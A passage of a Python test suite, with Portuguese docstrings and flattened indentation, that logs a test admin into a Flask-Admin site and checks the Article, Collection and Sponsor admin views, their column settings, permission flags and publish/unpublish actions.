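        # POST to Flask-Admin's action endpoint for the given record id
        return client.post(
            '%saction/' % index_url,
            data={'url': index_url, 'action': action, 'rowid': rowid},
            follow_redirects=True)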
class ArticleAdminViewTests(BaseTestCase):
def test_admin_article_list_records(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco
Quando:
- fazemos login e
- acessamos a pagina /admin/article/
Verificamos:
- o Article criado deve esta listado nessa página
"""
# with
article = makeOneArticle({'title': u'foo bar baz'})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# access the articles tab
article_list_response = client.get(url_for('article.index_view'))
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# check that the response
# contains the article id
self.assertIn(article.id, article_list_response.data.decode('utf-8'))
def test_admin_article_details(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco
Quando:
- fazemos login e
- acessamos a pagina de detalhe do article: /admin/article/details/
Verificamos:
- a pagina mostra o article certo
"""
# with
article = makeOneArticle()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_detail_url = url_for('article.details_view', id=article.id)
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# access the articles tab
article_detail_response = client.get(article_detail_url)
self.assertStatus(article_detail_response, 200)
self.assertTemplateUsed('admin/model/details.html')
# then
# check that the response
# contains the article id
self.assertIn(article.id, article_detail_response.data.decode('utf-8'))
def test_admin_article_search_by_id(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco
Quando:
- fazemos login e
- acessamos a pagina de detalhe do article: /admin/article/details/
- realizamos uma busca pelo id do article
Verificamos:
- a página mostra o article certo
"""
# with
article = makeOneArticle()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the articles tab
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
article_search_response = client.get(article_index_url, query_string={'search': article.id})
self.assertStatus(article_search_response, 200)
# check that the response contains the article id
self.assertIn(article.id, article_search_response.data.decode('utf-8'))
def test_admin_article_check_column_filters(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Article: /admin/article/
Verificamos:
- que contém todos os column_filters esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
expected_col_filters = [
'issue', 'journal', 'is_aop', 'is_public', 'unpublish_reason'
]
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the articles tab
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's filters
column_filters = self.get_context_variable('admin_view').column_filters
self.assertEqual(len(expected_col_filters), len(column_filters))
for expected_col_filter in expected_col_filters:
self.assertIn(expected_col_filter, column_filters)
def test_admin_article_check_searchable_columns(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
Verificamos:
- que contém todos os campos de busca esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
expected_column_searchable_list = [
'aid', 'issue', 'journal', 'title', 'domain_key'
]
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the articles tab
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's search fields
column_searchable_list = self.get_context_variable('admin_view').column_searchable_list
self.assertEqual(len(expected_column_searchable_list), len(column_searchable_list))
for expected_searchable_field in expected_column_searchable_list:
self.assertIn(expected_searchable_field, column_searchable_list)
def test_admin_article_check_column_exclude_list(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
Verificamos:
- que contém todos os campos excluidos da listagem são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
expected_column_exclude_list = [
'_id', 'aid', 'section', 'is_aop', 'htmls', 'domain_key', 'xml',
'unpublish_reason', 'translated_titles', 'sections', 'pdfs', 'languages',
'original_language', 'created', 'abstract', 'authors', 'order',
'abstract_languages', 'elocation', 'fpage', 'lpage', 'url_segment'
]
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the articles tab
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's excluded columns
column_exclude_list = self.get_context_variable('admin_view').column_exclude_list
self.assertEqual(len(expected_column_exclude_list), len(column_exclude_list))
for expected_excluded_field in expected_column_exclude_list:
self.assertIn(expected_excluded_field, column_exclude_list)
def test_admin_article_check_column_formatters(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
Verificamos:
- que contém todos os formatadores de campos como são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
expected_column_formatters = [
'created',
'updated',
]
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the articles tab
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's column formatters
column_formatters = self.get_context_variable('admin_view').column_formatters
self.assertEqual(len(expected_column_formatters), len(column_formatters))
for expected_column_formatter in expected_column_formatters:
self.assertIn(expected_column_formatter, column_formatters.keys())
def test_admin_article_check_column_labels_defined(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Article: /admin/article/
Verificamos:
- que contém todas as etiquetas de campos esperadas
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
expected_column_labels = [
'aid',
'issue',
'journal',
'title',
'section',
'is_aop',
'created',
'updated',
'htmls',
'domain_key',
'is_public',
'unpublish_reason',
'url_segment',
'pid',
'original_language',
'translated_titles',
'sections',
'authors',
'abstract',
'order',
'doi',
'languages',
'abstract_languages',
]
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the articles tab
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's column labels
column_labels = self.get_context_variable('admin_view').column_labels
self.assertEqual(len(expected_column_labels), len(column_labels))
for expected_column_label in expected_column_labels:
self.assertIn(expected_column_label, column_labels.keys())
def test_admin_article_check_can_create_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Article: /admin/article/
Verificamos:
- que não permite criar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the articles tab
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_create flag
can_create = self.get_context_variable('admin_view').can_create
self.assertFalse(can_create)
def test_admin_article_check_can_edit_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Article: /admin/article/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the articles tab
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_edit flag
can_edit = self.get_context_variable('admin_view').can_edit
self.assertFalse(can_edit)
def test_admin_article_check_can_delete_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
Verificamos:
- que não permite apagar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the articles tab
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_delete flag
can_delete = self.get_context_variable('admin_view').can_delete
self.assertFalse(can_delete)
def test_admin_article_check_create_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/article/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the articles tab
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's create_modal flag
create_modal = self.get_context_variable('admin_view').create_modal
self.assertTrue(create_modal)
def test_admin_article_check_edit_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/article/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the articles tab
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's edit_modal flag
edit_modal = self.get_context_variable('admin_view').edit_modal
self.assertTrue(edit_modal)
def test_admin_article_check_can_view_details_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the articles tab
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_view_details flag
can_view_details = self.get_context_variable('admin_view').can_view_details
self.assertTrue(can_view_details)
def test_admin_article_check_actions_defined(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
Verificamos:
- que contém todas as etiquetas de campos esperadas
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
expected_actions = [
'publish',
'unpublish_default',
]
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the articles tab
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's actions
actions = [a[0] for a in self.get_context_variable('actions')]
self.assertEqual(len(expected_actions), len(actions))
for expected_action in expected_actions:
self.assertIn(expected_action, actions)
def test_admin_article_action_publishing_an_unpublished_article(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco (is_public=False)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Articles: /admin/article/
- realizamos a ação de pubilcar
Verificamos:
- o artigo deve ficar como público
- o usuario é notificado do resultado da operação
"""
# with
article = makeOneArticle({'is_public': False})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
publish_action_url = '%saction/' % article_index_url
expected_msg = u'Artigo(s) publicado com sucesso!!'
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the article list
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# run the publish action:
action_response = client.post(
publish_action_url,
data={
'url': article_index_url,
'action': 'publish',
'rowid': article.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
article.reload()
self.assertTrue(article.is_public)
def test_admin_article_action_publishing_a_public_article(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco (is_public=True)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
- realizamos a ação de pubilcar
Verificamos:
- o article deve ficar como público
- o usuario é notificado do resultado da operação
"""
# with
article = makeOneArticle({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
action_url = '%saction/' % article_index_url
expected_msg = u'Artigo(s) publicado com sucesso!!'
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the article list
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# run the publish action:
action_response = client.post(
action_url,
data={
'url': article_index_url,
'action': 'publish',
'rowid': article.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
article.reload()
self.assertTrue(article.is_public)
def test_admin_article_action_unpublish_default_a_public_article(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco (is_public=True)
Quando:
- fazemos login e
- acessamos a pagina de listagem de articles: /admin/article/
- realizamos a ação de despublicar (unpublis_default)
Verificamos:
- o article deve ficar despublicado
- o motivo de despublicação deve ser por: 'Conteúdo temporariamente indisponível'
- o usuario é notificado do resultado da operação
"""
# with
article = makeOneArticle({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
action_url = '%saction/' % article_index_url
expected_msg = 'Artigo(s) despublicado com sucesso!!'
expected_reason = 'Conteúdo temporariamente indisponível'
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the article list
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# run the unpublish action:
action_response = client.post(
action_url,
data={
'url': article_index_url,
'action': 'unpublish_default',
'rowid': article.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
article.reload()
self.assertFalse(article.is_public)
self.assertEqual(expected_reason, article.unpublish_reason)
def test_admin_article_action_publish_with_exception_raised_must_be_consistent(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco (is_public=False)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Articles: /admin/article/
- realizamos a ação de publicacar, mas é levantada uma exceção no processo
Verificamos:
- o Article deve ficar como não público (is_public=False)
- o usuario é notificado que houve um erro na operação
"""
# with
article = makeOneArticle({'is_public': False})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
action_url = '%saction/' % article_index_url
expected_msg = u'Ocorreu um erro tentando despublicar o(s) número(s)!!.'
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the article list
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# run the publish action:
with self.assertRaises(Exception):
action_response = client.post(
action_url,
data={
'url': article_index_url,
'action': 'publish',
'rowid': None, # missing rowid should raise an exception
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
article.reload()
self.assertTrue(article.is_public)
def test_admin_article_action_unpublish_default_with_exception_raised_must_be_consistent(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Article no banco (is_public=True)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Articles: /admin/article/
- realizamos a ação de despublicacar (unpublish_default), mas é levantada uma exceção no processo
Verificamos:
- o article deve ficar como público (is_public=True)
- o usuario é notificado que houve um erro na operação
"""
# with
article = makeOneArticle({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
article_index_url = url_for('article.index_view')
action_url = '%saction/' % article_index_url
expected_msg = u'Ocorreu um erro tentando despublicar o(s) número(s)!!.'
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the article list
article_list_response = client.get(article_index_url)
self.assertStatus(article_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# run the unpublish action:
with self.assertRaises(Exception):
action_response = client.post(
action_url,
data={
'url': article_index_url,
'action': 'unpublish_default',
'rowid': None, # missing rowid should raise an exception
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
article.reload()
self.assertTrue(article.is_public)
class CollectionAdminViewTests(BaseTestCase):
def test_admin_collection_list_records(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Collection no banco
Quando:
- fazemos login e
- acessamos a pagina /admin/collection/
Verificamos:
- o Collection criado deve estar listado nessa página
- e o template utilizado é o esperado
"""
# with
collection = makeOneCollection()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# access the collections tab
collection_list_response = client.get(url_for('collection.index_view'))
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# check that the response
# contains the collection id
self.assertIn(collection.id, collection_list_response.data.decode('utf-8'))
def test_admin_collection_details(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Collection no banco
Quando:
- fazemos login e
- acessamos a pagina de detalhe do Collection: /admin/collection/details/
Verificamos:
- a pagina mostra o Collection certo
"""
# with
collection = makeOneCollection()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_detail_url = url_for('collection.details_view', id=collection.id)
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# access the collections tab
collection_detail_response = client.get(collection_detail_url)
self.assertStatus(collection_detail_response, 200)
self.assertTemplateUsed('admin/model/details.html')
# then
# check that the response
# contains the collection id
self.assertIn(collection.id, collection_detail_response.data.decode('utf-8'))
def test_admin_collection_check_column_exclude_list(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de collections: /admin/collection/
Verificamos:
- que contém todos os campos excluidos da listagem são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
expected_column_exclude_list = [
'_id', 'about', 'home_logo_pt', 'home_logo_es', 'home_logo_en',
'header_logo_pt', 'header_logo_es', 'header_logo_en',
'menu_logo_pt', 'menu_logo_es', 'menu_logo_en',
'logo_footer', 'logo_drop_menu'
]
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the collections tab
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's excluded columns
column_exclude_list = self.get_context_variable('admin_view').column_exclude_list
self.assertEqual(len(expected_column_exclude_list), len(column_exclude_list))
for expected_excluded_field in expected_column_exclude_list:
self.assertIn(expected_excluded_field, column_exclude_list)
def test_admin_collection_check_form_excluded_columns(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de collections: /admin/collection/
Verificamos:
- que contém todos os campos excluidos do formulario são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
expected_form_excluded_columns = ('acronym', 'metrics')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the collections tab
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's form excluded columns
form_excluded_columns = self.get_context_variable('admin_view').form_excluded_columns
self.assertEqual(len(expected_form_excluded_columns), len(form_excluded_columns))
for expected_form_excluded_column in expected_form_excluded_columns:
self.assertIn(expected_form_excluded_column, form_excluded_columns)
def test_admin_collection_check_can_create_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Article: /admin/collection/
Verificamos:
- que não permite criar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the collections tab
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_create flag
can_create = self.get_context_variable('admin_view').can_create
self.assertFalse(can_create)
def test_admin_collection_check_can_edit_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Article: /admin/collection/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the collections tab
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_edit flag
can_edit = self.get_context_variable('admin_view').can_edit
self.assertTrue(can_edit)
def test_admin_collection_check_can_delete_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de collections: /admin/collection/
Verificamos:
- que não permite apagar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the collections tab
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_delete flag
can_delete = self.get_context_variable('admin_view').can_delete
self.assertFalse(can_delete)
def test_admin_collection_check_create_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/collection/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the collections tab
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's create_modal flag
create_modal = self.get_context_variable('admin_view').create_modal
self.assertTrue(create_modal)
def test_admin_collection_check_edit_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/collection/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the collections tab
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's edit_modal flag
edit_modal = self.get_context_variable('admin_view').edit_modal
self.assertTrue(edit_modal)
def test_admin_collection_check_can_view_details_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de collections: /admin/collection/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
collection_index_url = url_for('collection.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the collections tab
collection_list_response = client.get(collection_index_url)
self.assertStatus(collection_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_view_details flag
can_view_details = self.get_context_variable('admin_view').can_view_details
self.assertTrue(can_view_details)
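# The makeOne* fixtures used throughout (makeOneIssue, makeOneArticle,
# makeOneCollection, makeOneSponsor) come from the suite's utils module and
# are not shown in this file. A commented sketch of the pattern they follow,
# assuming a MongoEngine-style document; the model class and defaults below
# are illustrative only:
#
#     from uuid import uuid4
#
#     def makeOneSponsor(attrs=None):
#         values = {'_id': uuid4().hex, 'name': 'funder name'}
#         values.update(attrs or {})
#         sponsor = Sponsor(**values)  # hypothetical model class
#         sponsor.save()
#         return sponsor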
class SponsorAdminViewTests(BaseTestCase):
def test_admin_sponsor_list_records(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Collection no banco
Quando:
- fazemos login e
- acessamos a pagina /admin/sponsor/
Verificamos:
- o Collection criado deve estar listado nessa página
- e o template utilizado é o esperado
"""
# with
sponsor = makeOneSponsor()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
